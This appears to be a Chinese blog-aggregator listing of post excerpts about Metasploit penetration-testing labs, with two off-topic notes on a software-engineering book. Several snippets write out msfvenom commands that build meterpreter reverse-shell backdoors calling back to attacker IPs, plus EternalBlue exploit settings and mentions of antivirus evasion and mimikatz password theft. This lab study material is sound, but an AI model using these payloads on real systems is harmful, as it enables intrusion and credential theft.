MSF
  • 2024-06-14MSF渗透使用说明
    实验环境前提:对方的445端口必须开放,首先要保证是能够访问到目标机器的,那么我们先ping一下目标机器,看网络是否连通如果无法ping的话,对方机器必须要关闭防火墙,或许有其他方法在对方开启防火墙的情况下访问到对方?目前采用关闭防火墙使用工具:kali
  • 2024-06-13红日复现为什么失败之struct漏洞复现
    struts2漏洞一、指纹识别s2的url路径组成(详见struts.xml配置文件):name工程名+namespace命名空间+atcion名称+extends拓展名部署在根目录下,工程名可为空;当然namespace名称也可设置为空;拓展名也可设置为空。方法一(1)url会有.action或.do后缀文件名(eg:http://192.168.xx.xx/integ
  • 2024-06-08记一次msf反弹shell小错误
    使用MSF生成后门程序,反弹shell设置攻击机IP和端口,生成后门程序sudomsfvenom-pwindows/meterpreter/reverse_tcplhost=172.24.4.7lport=4444-fexe-oattack.exe设置监听模块打开msfconsole使用以下命令设置监听模块msfconsoleuseexploit/multi/handlerset
  • 2024-06-06如何用Golang写msf插件模块
    最近有空在看msf,发现msf里面有模块的源码是golang的,去翻了翻wiki,wiki上面的编写日期是2018.12.13,搜了下国内,好像没有这方面的文章,那就自己跟着做做记个笔记首先第一步自然是安装go,官方wiki上测试是在1.11.2通过,建议使用version>=1.11.2的go,怎么安装go我不再赘述注意事项
  • 2024-06-03远控免杀篇
    0x00:前言随着近两年hvv和红蓝对抗以及国家对于网络安全的重视,国内防护水平都蹭蹭上了一个台阶,不管是内部人员的技术水平提高还是防护设备的层层部署,均给了红队人员想要进一步行动设置了障碍。 通过weblogic的cve-2019-2725获取了一个,想要进一步把shell迁移到msf或者CS进行
  • 2024-05-31msf攻击windows实例
    环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msf(msfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)一、Nmap端口收集nmap-sV-T4 192.168.129.132(
  • 2024-05-29CS配合MSF互传权限 以及使用mimikatz抓取明文密码
    cobaltstrike与metasploit互传权限1.cobalt传递权限给msf启动server端./teamserver[监听地址][密码]使用客户端连接:生成一个监听器在5555端口服务端上监听生成后门可以选择以上几种选择interact模块进行利用先生成一个外部http监听器这里填写msf主机所监
  • 2024-05-17内网渗透 Metasploit(MSF)基础使用
    免责申明以下内容仅供学习使用,非法使用造成的问题由使用人承担攻击思路漏洞探测(信息收集)<-fsacn,namp|漏洞利用<-工具(msf等)|获取服务器权限MSF使用Metasploit就是一个安全漏洞检测工具。它的全称叫做TheMetasploitFramework,简称MSF。MSF主要用于攻击非web端口1
  • 2024-05-0920212217刘恒谦-Exp6 MSF攻防实践
    实践内容本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:一个主动攻击实践,尽量使用最新的类似漏洞;(1分)首先生成木马文件,通过socat传输到windows主机上:​windows主机接收文件到火绒信任区,避免误杀:​之后,在windows中运行该木马程序,
  • 2024-04-13Cobalt Strike 与 MSF 联动
    使用CobaltStrike生成的会话和MSF相互连接,在内网渗透中,可以方便后期的渗透。一、CobaltStrike连接MSF会话1.上线msf会话msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.0.106lport=4422-fexe>backdoor.exe2.python开启web服务,下载木马python3-mhtt
  • 2024-04-05metasploit工具(msf)
    MSF基本介绍Metasploit是一个广泛使用的开源渗透测试框架,它提供了大量的工具和模块,用于模拟各种安全攻击,帮助安全专业人员评估和增强系统的安全性。它由Rapid7公司的H.D.Moore在2003年创立,并且由一个庞大的社区支持。Metasploit包含了一个漏洞数据库,用户可以通过它来搜索和利
  • 2024-03-03MSF渗透使用说明
    实验环境前提:对方的445端口必须开放,首先要保证是能够访问到目标机器的,那么我们先ping一下目标机器,看网络是否连通如果无法ping的话,对方机器必须要关闭防火墙,或许有其他方法在对方开启防火墙的情况下访问到对方?目前采用关闭防火墙使用工具:kali靶机:windowsser
  • 2024-02-02msf打永恒之蓝操作
    msf打永恒之蓝操作启动msf后,可以查看ms17-010的相关漏洞searchms17-010选用payload类型setpayloadwindows/x64/meterpreter/reverse_tcp选择漏洞利用类型:永恒之蓝setexploitwindows/smb/ms17_010_eternalblue设置攻击地址setrhost192.168.208.176攻
  • 2024-01-2620240126打卡——《构建之法》第5~8章
    第五章团队和流程5.2软件团队的模式主治医师模式、明星模式、社区模式、业余剧团模式、秘密团队、特工团队、交响乐团模式、爵士乐模式、功能团队模式、官僚模式5.3开发流程①写了再改模式②瀑布模型(WaterfallModel)是一个项目开发架构,开发过程是通过设计一系列阶段顺序
  • 2024-01-25构建之法Ⅲ
    敏捷流程    敏捷开发是一种迭代、灵活、以人为本的软件开发方法,其目标是通过及时反馈和灵活应对变化,以更快地交付高质量的软件。敏捷开发的原则主要体现在《敏捷宣言》和《敏捷开发原则》两个文件中。以下是《敏捷宣言》中的价值观和《敏捷开发原则》中的一些核心原则:《
  • 2023-12-24红队技巧12:cobaltstrike和msf相互联动
    前言我们在利用msf获取权限后有时候需要利用cobaltstrike的方便功能在利用cobaltstrike获取到权限后有时候需要利用msf的payload这时候就需要cobaltstrike和msf相互联动msf会话->cobaltstrike会话msf生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.30.
  • 2023-12-10Windows提权3
    本次学习通过msf提权当我们进行渗透时,已经成功上传了木马并返回了shell,这个时候为了后续渗透需要对目标机器进行提权当前用户为admin,我们想要提权到system最高权限当目标是Windowsserver2003,管理员用户运行木马时,直接使用getsystem提权  切换到普通用户运行木马,则无法直
  • 2023-11-30社工钓鱼
    前言渗透实验学习了社工钓鱼样本的使用,跟着指导书简单的学习,这里写一下社工钓鱼的学习笔记,但是没有过实操的经验,所以是理论性的学习。ps:未涉及免杀学习概述钓鱼常用在攻防演练对抗上,钓鱼的方式有很多,比如钓鱼网站、钓鱼邮件、钓鱼wifi、u盘钓鱼等等。这里练习一些钓鱼方法
  • 2023-11-12MSF生成远控木马
    实验环境:靶机Windowsserver2003  192.168.242.129攻击机kali 192.168.242.131实验工具:MetasploitFramework(MSF)实验过程:确定攻击机和靶机之间连通性 利用msfvenom生成远控木马msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上
  • 2023-10-30Metasploit使用教程
    Metasploit是一款广泛使用的漏洞评估和渗透测试框架,它可以用于测试网络的安全性,识别漏洞、攻击目标等。本篇教程将介绍如何使用Metasploit进行渗透测试,并对其相关功能进行详细说明。一、Metasploit简介Metasploit是一个开源框架,由Rapid7公司开发和维护,旨在帮助渗透测试人员和安
  • 2023-10-24vulnstack2靶场记录
    内网渗透:Vulnstack2靶场记录环境配置web机恢复快照至v1.3在VMWare上开一张新的虚拟网卡,网段为10.10.10.0/24检测连通性:在192.168.208.0/24网段下,Kali一开始死活ping不通web和PC,解决方案:允许防火墙进行ICMP回显netshfirewallseticmpsetting8:允许被ping关闭手
  • 2023-10-15MSF与CS互相派生
    目录CS与MSF互相派生CS派生给MSF使用CS建立监听MSF接收CS派生MSF派生给CS使用MSF建立监听CS与MSF互相派生CS派生给MSF使用CS建立监听创建CS监听端口利用创建的CS端口生成控制器设法传至受害机并进行运行,收到请求建立转发给MSF的监听端口MSF接收CS派生配置MSF使
  • 2023-10-12网安--暴力破解工具(wfuzz、hydra、medusa、msf)
    1、wfuzz 2、hydra  3、Medusa    4、msf辅助模块 
  • 2023-10-05centos搭建msf
    搭建msf官方有提供一键安装脚本,如下:curlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb>msfinstall&&chmod755msfinstall&&./msfinstall等安装成功直接输入msfconsole就可以运
  • 2023-10-01MSF恶意程序利用【实战】
    ★关于道德伦理的忠告★关于一些网络安全实战内容,我还是不厌其烦的写上这些忠告,请见谅。以下内容摘自《Metasploit渗透测试指南》作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:不要进行恶意的攻击;不要